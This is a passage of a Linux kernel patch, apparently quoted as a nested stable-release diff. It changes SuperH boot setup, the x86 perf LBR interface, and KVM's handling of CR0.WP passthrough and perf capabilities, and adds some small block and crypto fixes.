+ 8:	.long	sh_fdt_init
+ #endif
+ 
+diff --git a/arch/sh/kernel/nmi_debug.c b/arch/sh/kernel/nmi_debug.c
+index 11777867c6f5f..a212b645b4cf8 100644
+--- a/arch/sh/kernel/nmi_debug.c
++++ b/arch/sh/kernel/nmi_debug.c
+@@ -49,7 +49,7 @@ static int __init nmi_debug_setup(char *str)
+ 	register_die_notifier(&nmi_debug_nb);
+ 
+ 	if (*str != '=')
+-		return 0;
++		return 1;
+ 
+ 	for (p = str + 1; *p; p = sep + 1) {
+ 		sep = strchr(p, ',');
+@@ -70,6 +70,6 @@ static int __init nmi_debug_setup(char *str)
+ 			break;
+ 	}
+ 
+-	return 0;
++	return 1;
+ }
+ __setup("nmi_debug", nmi_debug_setup);
+diff --git a/arch/sh/kernel/setup.c b/arch/sh/kernel/setup.c
+index 1fcb6659822a3..af977ec4ca5e5 100644
+--- a/arch/sh/kernel/setup.c
++++ b/arch/sh/kernel/setup.c
+@@ -244,7 +244,7 @@ void __init __weak plat_early_device_setup(void)
+ {
+ }
+ 
+-#ifdef CONFIG_OF_FLATTREE
++#ifdef CONFIG_OF_EARLY_FLATTREE
+ void __ref sh_fdt_init(phys_addr_t dt_phys)
+ {
+ 	static int done = 0;
+@@ -326,7 +326,7 @@ void __init setup_arch(char **cmdline_p)
+ 	/* Let earlyprintk output early console messages */
+ 	sh_early_platform_driver_probe("earlyprintk", 1, 1);
+ 
+-#ifdef CONFIG_OF_FLATTREE
++#ifdef CONFIG_OF_EARLY_FLATTREE
+ #ifdef CONFIG_USE_BUILTIN_DTB
+ 	unflatten_and_copy_device_tree();
+ #else
+diff --git a/arch/sh/math-emu/sfp-util.h b/arch/sh/math-emu/sfp-util.h
+index 784f541344f36..bda50762b3d33 100644
+--- a/arch/sh/math-emu/sfp-util.h
++++ b/arch/sh/math-emu/sfp-util.h
+@@ -67,7 +67,3 @@
+   } while (0)
+ 
+ #define abort()	return 0
+-
+-#define __BYTE_ORDER __LITTLE_ENDIAN
+-
+-
+diff --git a/arch/x86/events/intel/lbr.c b/arch/x86/events/intel/lbr.c
+index 8259d725054d0..4dbde69c423ba 100644
+--- a/arch/x86/events/intel/lbr.c
++++ b/arch/x86/events/intel/lbr.c
+@@ -1603,10 +1603,8 @@ clear_arch_lbr:
+  * x86_perf_get_lbr - get the LBR records information
+  *
+  * @lbr: the caller's memory to store the LBR records information
+- *
+- * Returns: 0 indicates the LBR info has been successfully obtained
+  */
+-int x86_perf_get_lbr(struct x86_pmu_lbr *lbr)
++void x86_perf_get_lbr(struct x86_pmu_lbr *lbr)
+ {
+ 	int lbr_fmt = x86_pmu.intel_cap.lbr_format;
+ 
+@@ -1614,8 +1612,6 @@ int x86_perf_get_lbr(struct x86_pmu_lbr *lbr)
+ 	lbr->from = x86_pmu.lbr_from;
+ 	lbr->to = x86_pmu.lbr_to;
+ 	lbr->info = (lbr_fmt == LBR_FORMAT_INFO) ? x86_pmu.lbr_info : 0;
+-
+-	return 0;
+ }
+ EXPORT_SYMBOL_GPL(x86_perf_get_lbr);
+ 
+diff --git a/arch/x86/include/asm/perf_event.h b/arch/x86/include/asm/perf_event.h
+index 9ac46dbe57d48..5d0f6891ae611 100644
+--- a/arch/x86/include/asm/perf_event.h
++++ b/arch/x86/include/asm/perf_event.h
+@@ -543,12 +543,12 @@ static inline void perf_check_microcode(void) { }
+ 
+ #if defined(CONFIG_PERF_EVENTS) && defined(CONFIG_CPU_SUP_INTEL)
+ extern struct perf_guest_switch_msr *perf_guest_get_msrs(int *nr, void *data);
+-extern int x86_perf_get_lbr(struct x86_pmu_lbr *lbr);
++extern void x86_perf_get_lbr(struct x86_pmu_lbr *lbr);
+ #else
+ struct perf_guest_switch_msr *perf_guest_get_msrs(int *nr, void *data);
+-static inline int x86_perf_get_lbr(struct x86_pmu_lbr *lbr)
++static inline void x86_perf_get_lbr(struct x86_pmu_lbr *lbr)
+ {
+-	return -1;
++	memset(lbr, 0, sizeof(*lbr));
+ }
+ #endif
+ 
+diff --git a/arch/x86/kernel/amd_nb.c b/arch/x86/kernel/amd_nb.c
+index 4266b64631a46..7e331e8f36929 100644
+--- a/arch/x86/kernel/amd_nb.c
++++ b/arch/x86/kernel/amd_nb.c
+@@ -36,6 +36,7 @@
+ #define PCI_DEVICE_ID_AMD_19H_M50H_DF_F4 0x166e
+ #define PCI_DEVICE_ID_AMD_19H_M60H_DF_F4 0x14e4
+ #define PCI_DEVICE_ID_AMD_19H_M70H_DF_F4 0x14f4
++#define PCI_DEVICE_ID_AMD_19H_M78H_DF_F4 0x12fc
+ 
+ /* Protect the PCI config register pairs used for SMN. */
+ static DEFINE_MUTEX(smn_mutex);
+@@ -79,6 +80,7 @@ static const struct pci_device_id amd_nb_misc_ids[] = {
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_19H_M50H_DF_F3) },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_19H_M60H_DF_F3) },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_19H_M70H_DF_F3) },
++	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_19H_M78H_DF_F3) },
+ 	{}
+ };
+ 
+diff --git a/arch/x86/kvm/kvm_cache_regs.h b/arch/x86/kvm/kvm_cache_regs.h
+index 3febc342360cc..896cc73949442 100644
+--- a/arch/x86/kvm/kvm_cache_regs.h
++++ b/arch/x86/kvm/kvm_cache_regs.h
+@@ -4,7 +4,7 @@
+ 
+ #include <linux/kvm_host.h>
+ 
+-#define KVM_POSSIBLE_CR0_GUEST_BITS X86_CR0_TS
++#define KVM_POSSIBLE_CR0_GUEST_BITS	(X86_CR0_TS | X86_CR0_WP)
+ #define KVM_POSSIBLE_CR4_GUEST_BITS				  \
+ 	(X86_CR4_PVI | X86_CR4_DE | X86_CR4_PCE | X86_CR4_OSFXSR  \
+ 	 | X86_CR4_OSXMMEXCPT | X86_CR4_PGE | X86_CR4_TSD | X86_CR4_FSGSBASE)
+diff --git a/arch/x86/kvm/mmu.h b/arch/x86/kvm/mmu.h
+index 6bdaacb6faa07..59804be91b5b0 100644
+--- a/arch/x86/kvm/mmu.h
++++ b/arch/x86/kvm/mmu.h
+@@ -113,6 +113,8 @@ void kvm_init_shadow_ept_mmu(struct kvm_vcpu *vcpu, bool execonly,
+ bool kvm_can_do_async_pf(struct kvm_vcpu *vcpu);
+ int kvm_handle_page_fault(struct kvm_vcpu *vcpu, u64 error_code,
+ 				u64 fault_address, char *insn, int insn_len);
++void __kvm_mmu_refresh_passthrough_bits(struct kvm_vcpu *vcpu,
++					struct kvm_mmu *mmu);
+ 
+ int kvm_mmu_load(struct kvm_vcpu *vcpu);
+ void kvm_mmu_unload(struct kvm_vcpu *vcpu);
+@@ -153,6 +155,24 @@ static inline void kvm_mmu_load_pgd(struct kvm_vcpu *vcpu)
+ 					  vcpu->arch.mmu->root_role.level);
+ }
+ 
++static inline void kvm_mmu_refresh_passthrough_bits(struct kvm_vcpu *vcpu,
++						    struct kvm_mmu *mmu)
++{
++	/*
++	 * When EPT is enabled, KVM may passthrough CR0.WP to the guest, i.e.
++	 * @mmu's snapshot of CR0.WP and thus all related paging metadata may
++	 * be stale.  Refresh CR0.WP and the metadata on-demand when checking
++	 * for permission faults.  Exempt nested MMUs, i.e. MMUs for shadowing
++	 * nEPT and nNPT, as CR0.WP is ignored in both cases.  Note, KVM does
++	 * need to refresh nested_mmu, a.k.a. the walker used to translate L2
++	 * GVAs to GPAs, as that "MMU" needs to honor L2's CR0.WP.
++	 */
++	if (!tdp_enabled || mmu == &vcpu->arch.guest_mmu)
++		return;
++
++	__kvm_mmu_refresh_passthrough_bits(vcpu, mmu);
++}
++
+ /*
+  * Check if a given access (described through the I/D, W/R and U/S bits of a
+  * page fault error code pfec) causes a permission fault with the given PTE
+@@ -184,8 +204,12 @@ static inline u8 permission_fault(struct kvm_vcpu *vcpu, struct kvm_mmu *mmu,
+ 	u64 implicit_access = access & PFERR_IMPLICIT_ACCESS;
+ 	bool not_smap = ((rflags & X86_EFLAGS_AC) | implicit_access) == X86_EFLAGS_AC;
+ 	int index = (pfec + (not_smap << PFERR_RSVD_BIT)) >> 1;
+-	bool fault = (mmu->permissions[index] >> pte_access) & 1;
+ 	u32 errcode = PFERR_PRESENT_MASK;
++	bool fault;
++
++	kvm_mmu_refresh_passthrough_bits(vcpu, mmu);
++
++	fault = (mmu->permissions[index] >> pte_access) & 1;
+ 
+ 	WARN_ON(pfec & (PFERR_PK_MASK | PFERR_RSVD_MASK));
+ 	if (unlikely(mmu->pkru_mask)) {
+diff --git a/arch/x86/kvm/mmu/mmu.c b/arch/x86/kvm/mmu/mmu.c
+index b6f96d47e596d..230108a90cf39 100644
+--- a/arch/x86/kvm/mmu/mmu.c
++++ b/arch/x86/kvm/mmu/mmu.c
+@@ -232,6 +232,20 @@ static struct kvm_mmu_role_regs vcpu_to_role_regs(struct kvm_vcpu *vcpu)
+ 	return regs;
+ }
+ 
++static unsigned long get_guest_cr3(struct kvm_vcpu *vcpu)
++{
++	return kvm_read_cr3(vcpu);
++}
++
++static inline unsigned long kvm_mmu_get_guest_pgd(struct kvm_vcpu *vcpu,
++						  struct kvm_mmu *mmu)
++{
++	if (IS_ENABLED(CONFIG_RETPOLINE) && mmu->get_guest_pgd == get_guest_cr3)
++		return kvm_read_cr3(vcpu);
++
++	return mmu->get_guest_pgd(vcpu);
++}
++
+ static inline bool kvm_available_flush_tlb_with_range(void)
+ {
+ 	return kvm_x86_ops.tlb_remote_flush_with_range;
+@@ -3661,7 +3675,7 @@ static int mmu_alloc_shadow_roots(struct kvm_vcpu *vcpu)
+ 	int quadrant, i, r;
+ 	hpa_t root;
+ 
+-	root_pgd = mmu->get_guest_pgd(vcpu);
++	root_pgd = kvm_mmu_get_guest_pgd(vcpu, mmu);
+ 	root_gfn = root_pgd >> PAGE_SHIFT;
+ 
+ 	if (mmu_check_root(vcpu, root_gfn))
+@@ -4112,7 +4126,7 @@ static bool kvm_arch_setup_async_pf(struct kvm_vcpu *vcpu, gpa_t cr2_or_gpa,
+ 	arch.token = alloc_apf_token(vcpu);
+ 	arch.gfn = gfn;
+ 	arch.direct_map = vcpu->arch.mmu->root_role.direct;
+-	arch.cr3 = vcpu->arch.mmu->get_guest_pgd(vcpu);
++	arch.cr3 = kvm_mmu_get_guest_pgd(vcpu, vcpu->arch.mmu);
+ 
+ 	return kvm_setup_async_pf(vcpu, cr2_or_gpa,
+ 				  kvm_vcpu_gfn_to_hva(vcpu, gfn), &arch);
+@@ -4131,7 +4145,7 @@ void kvm_arch_async_page_ready(struct kvm_vcpu *vcpu, struct kvm_async_pf *work)
+ 		return;
+ 
+ 	if (!vcpu->arch.mmu->root_role.direct &&
+-	      work->arch.cr3 != vcpu->arch.mmu->get_guest_pgd(vcpu))
++	      work->arch.cr3 != kvm_mmu_get_guest_pgd(vcpu, vcpu->arch.mmu))
+ 		return;
+ 
+ 	kvm_mmu_do_page_fault(vcpu, work->cr2_or_gpa, 0, true);
+@@ -4488,11 +4502,6 @@ void kvm_mmu_new_pgd(struct kvm_vcpu *vcpu, gpa_t new_pgd)
+ }
+ EXPORT_SYMBOL_GPL(kvm_mmu_new_pgd);
+ 
+-static unsigned long get_cr3(struct kvm_vcpu *vcpu)
+-{
+-	return kvm_read_cr3(vcpu);
+-}
+-
+ static bool sync_mmio_spte(struct kvm_vcpu *vcpu, u64 *sptep, gfn_t gfn,
+ 			   unsigned int access)
+ {
+@@ -4996,6 +5005,21 @@ kvm_calc_cpu_role(struct kvm_vcpu *vcpu, const struct kvm_mmu_role_regs *regs)
+ 	return role;
+ }
+ 
++void __kvm_mmu_refresh_passthrough_bits(struct kvm_vcpu *vcpu,
++					struct kvm_mmu *mmu)
++{
++	const bool cr0_wp = !!kvm_read_cr0_bits(vcpu, X86_CR0_WP);
++
++	BUILD_BUG_ON((KVM_MMU_CR0_ROLE_BITS & KVM_POSSIBLE_CR0_GUEST_BITS) != X86_CR0_WP);
++	BUILD_BUG_ON((KVM_MMU_CR4_ROLE_BITS & KVM_POSSIBLE_CR4_GUEST_BITS));
++
++	if (is_cr0_wp(mmu) == cr0_wp)
++		return;
++
++	mmu->cpu_role.base.cr0_wp = cr0_wp;
++	reset_guest_paging_metadata(vcpu, mmu);
++}
++
+ static inline int kvm_mmu_get_tdp_level(struct kvm_vcpu *vcpu)
+ {
+ 	/* tdp_root_level is architecture forced level, use it if nonzero */
+@@ -5043,7 +5067,7 @@ static void init_kvm_tdp_mmu(struct kvm_vcpu *vcpu,
+ 	context->page_fault = kvm_tdp_page_fault;
+ 	context->sync_page = nonpaging_sync_page;
+ 	context->invlpg = NULL;
+-	context->get_guest_pgd = get_cr3;
++	context->get_guest_pgd = get_guest_cr3;
+ 	context->get_pdptr = kvm_pdptr_read;
+ 	context->inject_page_fault = kvm_inject_page_fault;
+ 
+@@ -5193,7 +5217,7 @@ static void init_kvm_softmmu(struct kvm_vcpu *vcpu,
+ 
+ 	kvm_init_shadow_mmu(vcpu, cpu_role);
+ 
+-	context->get_guest_pgd     = get_cr3;
++	context->get_guest_pgd     = get_guest_cr3;
+ 	context->get_pdptr         = kvm_pdptr_read;
+ 	context->inject_page_fault = kvm_inject_page_fault;
+ }
+@@ -5207,7 +5231,7 @@ static void init_kvm_nested_mmu(struct kvm_vcpu *vcpu,
+ 		return;
+ 
+ 	g_context->cpu_role.as_u64   = new_mode.as_u64;
+-	g_context->get_guest_pgd     = get_cr3;
++	g_context->get_guest_pgd     = get_guest_cr3;
+ 	g_context->get_pdptr         = kvm_pdptr_read;
+ 	g_context->inject_page_fault = kvm_inject_page_fault;
+ 
+diff --git a/arch/x86/kvm/mmu/paging_tmpl.h b/arch/x86/kvm/mmu/paging_tmpl.h
+index 5ab5f94dcb6fd..1f4f5e703f136 100644
+--- a/arch/x86/kvm/mmu/paging_tmpl.h
++++ b/arch/x86/kvm/mmu/paging_tmpl.h
+@@ -324,7 +324,7 @@ static int FNAME(walk_addr_generic)(struct guest_walker *walker,
+ 	trace_kvm_mmu_pagetable_walk(addr, access);
+ retry_walk:
+ 	walker->level = mmu->cpu_role.base.level;
+-	pte           = mmu->get_guest_pgd(vcpu);
++	pte           = kvm_mmu_get_guest_pgd(vcpu, mmu);
+ 	have_ad       = PT_HAVE_ACCESSED_DIRTY(mmu);
+ 
+ #if PTTYPE == 64
+diff --git a/arch/x86/kvm/pmu.c b/arch/x86/kvm/pmu.c
+index de1fd73697365..20cd746cf4678 100644
+--- a/arch/x86/kvm/pmu.c
++++ b/arch/x86/kvm/pmu.c
+@@ -418,9 +418,9 @@ int kvm_pmu_rdpmc(struct kvm_vcpu *vcpu, unsigned idx, u64 *data)
+ 	if (!pmc)
+ 		return 1;
+ 
+-	if (!(kvm_read_cr4(vcpu) & X86_CR4_PCE) &&
++	if (!(kvm_read_cr4_bits(vcpu, X86_CR4_PCE)) &&
+ 	    (static_call(kvm_x86_get_cpl)(vcpu) != 0) &&
+-	    (kvm_read_cr0(vcpu) & X86_CR0_PE))
++	    (kvm_read_cr0_bits(vcpu, X86_CR0_PE)))
+ 		return 1;
+ 
+ 	*data = pmc_read_counter(pmc) & mask;
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index 9599931c7d572..fc1649b5931a4 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -2709,6 +2709,7 @@ static int svm_get_msr_feature(struct kvm_msr_entry *msr)
+ 			msr->data |= MSR_AMD64_DE_CFG_LFENCE_SERIALIZE;
+ 		break;
+ 	case MSR_IA32_PERF_CAPABILITIES:
++		msr->data = kvm_caps.supported_perf_cap;
+ 		return 0;
+ 	default:
+ 		return KVM_MSR_RET_INVALID;
+@@ -4888,6 +4889,7 @@ static __init void svm_set_cpu_caps(void)
+ {
+ 	kvm_set_cpu_caps();
+ 
++	kvm_caps.supported_perf_cap = 0;
+ 	kvm_caps.supported_xss = 0;
+ 
+ 	/* CPUID 0x80000001 and 0x8000000A (SVM features) */
+diff --git a/arch/x86/kvm/vmx/capabilities.h b/arch/x86/kvm/vmx/capabilities.h
+index 07254314f3dd5..cd2ac9536c998 100644
+--- a/arch/x86/kvm/vmx/capabilities.h
++++ b/arch/x86/kvm/vmx/capabilities.h
+@@ -395,30 +395,6 @@ static inline bool vmx_pebs_supported(void)
+ 	return boot_cpu_has(X86_FEATURE_PEBS) && kvm_pmu_cap.pebs_ept;
+ }
+ 
+-static inline u64 vmx_get_perf_capabilities(void)
+-{
+-	u64 perf_cap = PMU_CAP_FW_WRITES;
+-	struct x86_pmu_lbr lbr;
+-	u64 host_perf_cap = 0;
+-
+-	if (!enable_pmu)
+-		return 0;
+-
+-	if (boot_cpu_has(X86_FEATURE_PDCM))
+-		rdmsrl(MSR_IA32_PERF_CAPABILITIES, host_perf_cap);
+-
+-	if (x86_perf_get_lbr(&lbr) >= 0 && lbr.nr)
+-		perf_cap |= host_perf_cap & PMU_CAP_LBR_FMT;
+-
+-	if (vmx_pebs_supported()) {
+-		perf_cap |= host_perf_cap & PERF_CAP_PEBS_MASK;
+-		if ((perf_cap & PERF_CAP_PEBS_FORMAT) < 4)
+-			perf_cap &= ~PERF_CAP_PEBS_BASELINE;
+-	}
+-
+-	return perf_cap;
+-}
+-
+ static inline bool cpu_has_notify_vmexit(void)
+ {
+ 	return vmcs_config.cpu_based_2nd_exec_ctrl &
+diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
+index 8e56ec6e72e9d..9d683b6067c7b 100644
+--- a/arch/x86/kvm/vmx/nested.c
++++ b/arch/x86/kvm/vmx/nested.c
+@@ -4460,7 +4460,7 @@ static void load_vmcs12_host_state(struct kvm_vcpu *vcpu,
+ 	 * CR0_GUEST_HOST_MASK is already set in the original vmcs01
+ 	 * (KVM doesn't change it);
+ 	 */
+-	vcpu->arch.cr0_guest_owned_bits = KVM_POSSIBLE_CR0_GUEST_BITS;
++	vcpu->arch.cr0_guest_owned_bits = vmx_l1_guest_owned_cr0_bits();
+ 	vmx_set_cr0(vcpu, vmcs12->host_cr0);
+ 
+ 	/* Same as above - no reason to call set_cr4_guest_host_mask().  */
+@@ -4611,7 +4611,7 @@ static void nested_vmx_restore_host_state(struct kvm_vcpu *vcpu)
+ 	 */
+ 	vmx_set_efer(vcpu, nested_vmx_get_vmcs01_guest_efer(vmx));
+ 
+-	vcpu->arch.cr0_guest_owned_bits = KVM_POSSIBLE_CR0_GUEST_BITS;
++	vcpu->arch.cr0_guest_owned_bits = vmx_l1_guest_owned_cr0_bits();
+ 	vmx_set_cr0(vcpu, vmcs_readl(CR0_READ_SHADOW));
+ 
+ 	vcpu->arch.cr4_guest_owned_bits = ~vmcs_readl(CR4_GUEST_HOST_MASK);
+diff --git a/arch/x86/kvm/vmx/pmu_intel.c b/arch/x86/kvm/vmx/pmu_intel.c
+index 10b33da9bd058..9fabfe71fd879 100644
+--- a/arch/x86/kvm/vmx/pmu_intel.c
++++ b/arch/x86/kvm/vmx/pmu_intel.c
+@@ -631,7 +631,7 @@ static void intel_pmu_init(struct kvm_vcpu *vcpu)
+ 		pmu->fixed_counters[i].current_config = 0;
+ 	}
+ 
+-	vcpu->arch.perf_capabilities = vmx_get_perf_capabilities();
++	vcpu->arch.perf_capabilities = kvm_caps.supported_perf_cap;
+ 	lbr_desc->records.nr = 0;
+ 	lbr_desc->event = NULL;
+ 	lbr_desc->msr_passthrough = false;
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index 4c9116d223df5..07aab85922441 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -1879,7 +1879,7 @@ static int vmx_get_msr_feature(struct kvm_msr_entry *msr)
+ 			return 1;
+ 		return vmx_get_vmx_msr(&vmcs_config.nested, msr->index, &msr->data);
+ 	case MSR_IA32_PERF_CAPABILITIES:
+-		msr->data = vmx_get_perf_capabilities();
++		msr->data = kvm_caps.supported_perf_cap;
+ 		return 0;
+ 	default:
+ 		return KVM_MSR_RET_INVALID;
+@@ -2058,7 +2058,7 @@ static u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated
+ 	    (host_initiated || guest_cpuid_has(vcpu, X86_FEATURE_BUS_LOCK_DETECT)))
+ 		debugctl |= DEBUGCTLMSR_BUS_LOCK_DETECT;
+ 
+-	if ((vmx_get_perf_capabilities() & PMU_CAP_LBR_FMT) &&
++	if ((kvm_caps.supported_perf_cap & PMU_CAP_LBR_FMT) &&
+ 	    (host_initiated || intel_pmu_lbr_is_enabled(vcpu)))
+ 		debugctl |= DEBUGCTLMSR_LBR | DEBUGCTLMSR_FREEZE_LBRS_ON_PMI;
+ 
+@@ -2371,14 +2371,14 @@ static int vmx_set_msr(struct kvm_vcpu *vcpu, struct msr_data *msr_info)
+ 			return 1;
+ 		if (data & PMU_CAP_LBR_FMT) {
+ 			if ((data & PMU_CAP_LBR_FMT) !=
+-			    (vmx_get_perf_capabilities() & PMU_CAP_LBR_FMT))
++			    (kvm_caps.supported_perf_cap & PMU_CAP_LBR_FMT))
+ 				return 1;
+ 			if (!cpuid_model_is_consistent(vcpu))
+ 				return 1;
+ 		}
+ 		if (data & PERF_CAP_PEBS_FORMAT) {
+ 			if ((data & PERF_CAP_PEBS_MASK) !=
+-			    (vmx_get_perf_capabilities() & PERF_CAP_PEBS_MASK))
++			    (kvm_caps.supported_perf_cap & PERF_CAP_PEBS_MASK))
+ 				return 1;
+ 			if (!guest_cpuid_has(vcpu, X86_FEATURE_DS))
+ 				return 1;
+@@ -4695,7 +4695,7 @@ static void init_vmcs(struct vcpu_vmx *vmx)
+ 	/* 22.2.1, 20.8.1 */
+ 	vm_entry_controls_set(vmx, vmx_vmentry_ctrl());
+ 
+-	vmx->vcpu.arch.cr0_guest_owned_bits = KVM_POSSIBLE_CR0_GUEST_BITS;
++	vmx->vcpu.arch.cr0_guest_owned_bits = vmx_l1_guest_owned_cr0_bits();
+ 	vmcs_writel(CR0_GUEST_HOST_MASK, ~vmx->vcpu.arch.cr0_guest_owned_bits);
+ 
+ 	set_cr4_guest_host_mask(vmx);
+@@ -5417,7 +5417,7 @@ static int handle_cr(struct kvm_vcpu *vcpu)
+ 		break;
+ 	case 3: /* lmsw */
+ 		val = (exit_qualification >> LMSW_SOURCE_DATA_SHIFT) & 0x0f;
+-		trace_kvm_cr_write(0, (kvm_read_cr0(vcpu) & ~0xful) | val);
++		trace_kvm_cr_write(0, (kvm_read_cr0_bits(vcpu, ~0xful) | val));
+ 		kvm_lmsw(vcpu, val);
+ 
+ 		return kvm_skip_emulated_instruction(vcpu);
+@@ -7496,7 +7496,7 @@ static u8 vmx_get_mt_mask(struct kvm_vcpu *vcpu, gfn_t gfn, bool is_mmio)
+ 	if (!kvm_arch_has_noncoherent_dma(vcpu->kvm))
+ 		return (MTRR_TYPE_WRBACK << VMX_EPT_MT_EPTE_SHIFT) | VMX_EPT_IPAT_BIT;
+ 
+-	if (kvm_read_cr0(vcpu) & X86_CR0_CD) {
++	if (kvm_read_cr0_bits(vcpu, X86_CR0_CD)) {
+ 		if (kvm_check_has_quirk(vcpu->kvm, KVM_X86_QUIRK_CD_NW_CLEARED))
+ 			cache = MTRR_TYPE_WRBACK;
+ 		else
+@@ -7702,6 +7702,33 @@ static void vmx_vcpu_after_set_cpuid(struct kvm_vcpu *vcpu)
+ 	vmx_update_exception_bitmap(vcpu);
+ }
+ 
++static u64 vmx_get_perf_capabilities(void)
++{
++	u64 perf_cap = PMU_CAP_FW_WRITES;
++	struct x86_pmu_lbr lbr;
++	u64 host_perf_cap = 0;
++
++	if (!enable_pmu)
++		return 0;
++
++	if (boot_cpu_has(X86_FEATURE_PDCM))
++		rdmsrl(MSR_IA32_PERF_CAPABILITIES, host_perf_cap);
++
++	if (!cpu_feature_enabled(X86_FEATURE_ARCH_LBR)) {
++		x86_perf_get_lbr(&lbr);
++		if (lbr.nr)
++			perf_cap |= host_perf_cap & PMU_CAP_LBR_FMT;
++	}
++
++	if (vmx_pebs_supported()) {
++		perf_cap |= host_perf_cap & PERF_CAP_PEBS_MASK;
++		if ((perf_cap & PERF_CAP_PEBS_FORMAT) < 4)
++			perf_cap &= ~PERF_CAP_PEBS_BASELINE;
++	}
++
++	return perf_cap;
++}
++
+ static __init void vmx_set_cpu_caps(void)
+ {
+ 	kvm_set_cpu_caps();
+@@ -7724,6 +7751,7 @@ static __init void vmx_set_cpu_caps(void)
+ 
+ 	if (!enable_pmu)
+ 		kvm_cpu_cap_clear(X86_FEATURE_PDCM);
++	kvm_caps.supported_perf_cap = vmx_get_perf_capabilities();
+ 
+ 	if (!enable_sgx) {
+ 		kvm_cpu_cap_clear(X86_FEATURE_SGX);
+diff --git a/arch/x86/kvm/vmx/vmx.h b/arch/x86/kvm/vmx/vmx.h
+index a3da84f4ea456..e2b04f4c0fef3 100644
+--- a/arch/x86/kvm/vmx/vmx.h
++++ b/arch/x86/kvm/vmx/vmx.h
+@@ -640,6 +640,24 @@ BUILD_CONTROLS_SHADOW(tertiary_exec, TERTIARY_VM_EXEC_CONTROL, 64)
+ 				(1 << VCPU_EXREG_EXIT_INFO_1) | \
+ 				(1 << VCPU_EXREG_EXIT_INFO_2))
+ 
++static inline unsigned long vmx_l1_guest_owned_cr0_bits(void)
++{
++	unsigned long bits = KVM_POSSIBLE_CR0_GUEST_BITS;
++
++	/*
++	 * CR0.WP needs to be intercepted when KVM is shadowing legacy paging
++	 * in order to construct shadow PTEs with the correct protections.
++	 * Note!  CR0.WP technically can be passed through to the guest if
++	 * paging is disabled, but checking CR0.PG would generate a cyclical
++	 * dependency of sorts due to forcing the caller to ensure CR0 holds
++	 * the correct value prior to determining which CR0 bits can be owned
++	 * by L1.  Keep it simple and limit the optimization to EPT.
++	 */
++	if (!enable_ept)
++		bits &= ~X86_CR0_WP;
++	return bits;
++}
++
+ static inline struct kvm_vmx *to_kvm_vmx(struct kvm *kvm)
+ {
+ 	return container_of(kvm, struct kvm_vmx, kvm);
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index 3463ef7f30196..d7af225b63d89 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -910,6 +910,18 @@ EXPORT_SYMBOL_GPL(load_pdptrs);
+ 
+ void kvm_post_set_cr0(struct kvm_vcpu *vcpu, unsigned long old_cr0, unsigned long cr0)
+ {
++	/*
++	 * CR0.WP is incorporated into the MMU role, but only for non-nested,
++	 * indirect shadow MMUs.  If TDP is enabled, the MMU's metadata needs
++	 * to be updated, e.g. so that emulating guest translations does the
++	 * right thing, but there's no need to unload the root as CR0.WP
++	 * doesn't affect SPTEs.
++	 */
++	if (tdp_enabled && (cr0 ^ old_cr0) == X86_CR0_WP) {
++		kvm_init_mmu(vcpu);
++		return;
++	}
++
+ 	if ((cr0 ^ old_cr0) & X86_CR0_PG) {
+ 		kvm_clear_async_pf_completion_queue(vcpu);
+ 		kvm_async_pf_hash_reset(vcpu);
+diff --git a/arch/x86/kvm/x86.h b/arch/x86/kvm/x86.h
+index 829d3134c1eb0..9de72586f4065 100644
+--- a/arch/x86/kvm/x86.h
++++ b/arch/x86/kvm/x86.h
+@@ -27,6 +27,7 @@ struct kvm_caps {
+ 	u64 supported_mce_cap;
+ 	u64 supported_xcr0;
+ 	u64 supported_xss;
++	u64 supported_perf_cap;
+ };
+ 
+ void kvm_spurious_fault(void);
+diff --git a/arch/x86/lib/clear_page_64.S b/arch/x86/lib/clear_page_64.S
+index ecbfb4dd3b019..faa4cdc747a3e 100644
+--- a/arch/x86/lib/clear_page_64.S
++++ b/arch/x86/lib/clear_page_64.S
+@@ -142,8 +142,8 @@ SYM_FUNC_START(clear_user_rep_good)
+ 	and $7, %edx
+ 	jz .Lrep_good_exit
+ 
+-.Lrep_good_bytes:
+ 	mov %edx, %ecx
++.Lrep_good_bytes:
+ 	rep stosb
+ 
+ .Lrep_good_exit:
+diff --git a/arch/x86/lib/retpoline.S b/arch/x86/lib/retpoline.S
+index 073289a55f849..841955dc2573d 100644
+--- a/arch/x86/lib/retpoline.S
++++ b/arch/x86/lib/retpoline.S
+@@ -87,8 +87,8 @@ SYM_CODE_END(__x86_indirect_thunk_array)
+  */
+ 	.align 64
+ 	.skip 63, 0xcc
+-SYM_FUNC_START_NOALIGN(zen_untrain_ret);
+-
++SYM_START(zen_untrain_ret, SYM_L_GLOBAL, SYM_A_NONE)
++	ANNOTATE_NOENDBR
+ 	/*
+ 	 * As executed from zen_untrain_ret, this is:
+ 	 *
+diff --git a/block/blk-cgroup.c b/block/blk-cgroup.c
+index 7c91d9195da8d..60f366f98fa2b 100644
+--- a/block/blk-cgroup.c
++++ b/block/blk-cgroup.c
+@@ -468,6 +468,9 @@ restart:
+ 	list_for_each_entry_safe(blkg, n, &q->blkg_list, q_node) {
+ 		struct blkcg *blkcg = blkg->blkcg;
+ 
++		if (hlist_unhashed(&blkg->blkcg_node))
++			continue;
++
+ 		spin_lock(&blkcg->lock);
+ 		blkg_destroy(blkg);
+ 		spin_unlock(&blkcg->lock);
+diff --git a/crypto/algapi.c b/crypto/algapi.c
+index c72622f20f52b..8c3a869cc43a9 100644
+--- a/crypto/algapi.c
++++ b/crypto/algapi.c
+@@ -944,6 +944,9 @@ EXPORT_SYMBOL_GPL(crypto_enqueue_request);
+ void crypto_enqueue_request_head(struct crypto_queue *queue,
+ 				 struct crypto_async_request *request)
+ {
